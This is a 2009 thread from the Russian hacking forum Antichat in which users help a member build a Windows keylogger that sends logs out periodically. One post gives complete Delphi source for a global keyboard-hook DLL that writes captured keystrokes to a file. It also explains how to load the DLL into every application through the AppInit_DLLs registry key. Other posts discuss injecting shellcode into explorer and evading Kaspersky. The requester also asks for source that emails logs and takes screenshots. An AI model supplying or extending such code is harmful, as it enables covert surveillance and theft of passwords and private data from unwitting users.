Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.04.2009, 18:10
|
|
Постоянный
Регистрация: 29.04.2007
Сообщений: 496
Провел на форуме:
2715445
Репутация:
588
|
|
Сообщение от slesh
2 Hellsp@wn
Неуверен что ты сможешь на делфи похукать SDT и тем более чтобы это у тебя работало.
для непосвяшенных это делается в ring0 (kernel-mode) из драйвера. Хотя дрова писать на дельфе - это тру!
после этого даже объяснять ничего не хочется. есть такая вещь, эксплоит называется. если тебе нужен мастер класс пиши в пм проведу, оффтопить хватит.
Сообщение от miqo
и еще пожалуйста подскажите как сделать чтобы через заданный промежуток времени программа выполняла команды,но без TTmer а.например через каждые 3 часа отправляла лог или проверяла подключен ли интернет или размер файла лога.....
http://www.sql.ru/forum/actualthread.aspx?tid=217966
Последний раз редактировалось Hellsp@wn; 11.04.2009 в 18:13..
|
|
|
11.04.2009, 18:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
Ставь касперского 7 на полной проактивке и слушай поросячий визг от установшиков хуков )
На счет шелкода - можно поспорить. Ну вот запустил ты свою прогу, и она заинжектит куданить шелкод. Ну хотябы в тотже эксплорер (WriteProcessMemory) один инжект тебя убьет.
Ну ты еще можешь поставить через SetWindowsHookEx хук на Клаву (WH_KEYBOARD) но твоя прога должна тогда выглядеть в виде DLL которая тупо должна грузится к приложениям. А если приложения консольное, то хрен такое сработает.
А если паливность вообще закинуть куда подальше, то все средства хороши.
Тупо берем пример из DW
Код:
library Hook;
uses Windows, SysUtils;
const KF_UP_MY = $40000000;
var CurrentHook: HHook;
KeyArray: array[0..19] of char;
KeyArrayPtr: integer;
CurFile:text;
function GlobalKeyBoardHook(code: integer; wParam: integer; lParam:
integer): longword; stdcall;
var
i:integer;
begin
if code< 0 then
begin
result:=CallNextHookEx(CurrentHook,code,wParam,lparam);
Exit;
end;
if ( (lParam and KF_UP_MY ) = 0) and (wParam> =65) and (wParam< =90) then
begin
KeyArray[KeyArrayPtr]:=char(wParam);
KeyArrayPtr:=KeyArrayPtr+1;
if KeyArrayPtr> 19 then
begin
for i:=0 to 19 do
begin
Assignfile(CurFile,'d:\log.txt');
if fileexists('d:\log.txt')=false then rewrite(CurFile)
else Append(CurFile);
write(Curfile, KeyArray[i]);
closefile(curfile);
end;
KeyArrayPtr:=0;
end;
end;
CallNextHookEx(CurrentHook,code,wParam,lparam);
result:=0;
end;
procedure SetupGlobalKeyBoardHook;
begin
CurrentHook:=SetWindowsHookEx(WH_KEYBOARD, @GlobalKeyBoardHook,HInstance, 0);
KeyArrayptr:=0;
end;
procedure unhook;
begin
UnhookWindowshookEx(CurrentHook);
end;
exports
SetupGlobalKeyBoardHook, UnHook;
begin
end.
И тупо прописываешь его в
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Вот и тебе и хукер. А там уже добавить таблицу системных кнопок типа ESC и тому подобных, а также по дискриптору окна определяешь имя окна и процесса где это было вписано. Вот тебе и хороший кейлогер.
/me ушел вешаться из-за поросячих визгов товарища Касперского. |
|
|
|
11.04.2009, 18:23
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 95
Провел на форуме:
270938
Репутация:
0
|
|
спс всем!!!
а как на счет второго вопроса?
и еще пожалуйста подскажите как сделать чтобы через заданный промежуток времени программа выполняла команды,но без TTmer а.например через каждые 3 часа отправляла лог или проверяла подключен ли интернет или размер файла лога.....
Последний раз редактировалось miqo; 11.04.2009 в 18:36..
|
|
|
|
11.04.2009, 18:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2007
Сообщений: 642
Провел на форуме:
3241649
Репутация:
1632
|
|
Hellsp@wn инжект в доверенный процесс это уже давным довно прошлый век и палится на раз!
послушай слеша) он умный)
__________________
<<<< Смотри на дату моей реги и завидуй!!!
|
|
|
|
11.04.2009, 18:53
|
|
Постоянный
Регистрация: 29.04.2007
Сообщений: 496
Провел на форуме:
2715445
Репутация:
588
|
|
sboy20042 если ты не знаешь способов, это не значит что их вообще нету. или CreateRemoteThread / Set(Get)ThreadContext / QueueUserAPC это предел?
miqo
http://www.sql.ru/forum/actualthread.aspx?tid=217966
|
|
|
|
11.04.2009, 18:54
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 95
Провел на форуме:
270938
Репутация:
0
|
|
плз!!!напишите побыстрее мне очень срочно надо
|
|
|
|
11.04.2009, 21:42
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме:
811764
Репутация:
119
|
|
miqo, тебе Hellsp@wn дал ссылку:
http://www.sql.ru/forum/actualthread.aspx?tid=217966
Последний раз редактировалось criz; 11.04.2009 в 21:44..
|
|
|
|
11.04.2009, 23:31
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 95
Провел на форуме:
270938
Репутация:
0
|
|
спасибо большое!!!!
|
|
|
|
12.04.2009, 00:32
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929
Репутация:
395
|
|
C пеной у рта вы тут все доказываете... а ведь под вин есть дофига способов реализовывать кей логеры... от написания собстенного драйвера клавиатуры
до юзанья стандартных хуков (в промежутке можно кучи способов найти двигаясь от ring0 до ring3)
Самый клевый кей логгер это аппаратный кей логгер ))) встраиваемый в клаву или в штур и никаких проблем, кроссплатформенный )
Последнее время камперычи всякие и оутпосты так сидят в ядре эх
|
|
|
|
12.04.2009, 09:28
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 95
Провел на форуме:
270938
Репутация:
0
|
|
а может у кого есть исходник с описаниями на асм е.но чтоб было отправка на майл,функция скртншота и т.д.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
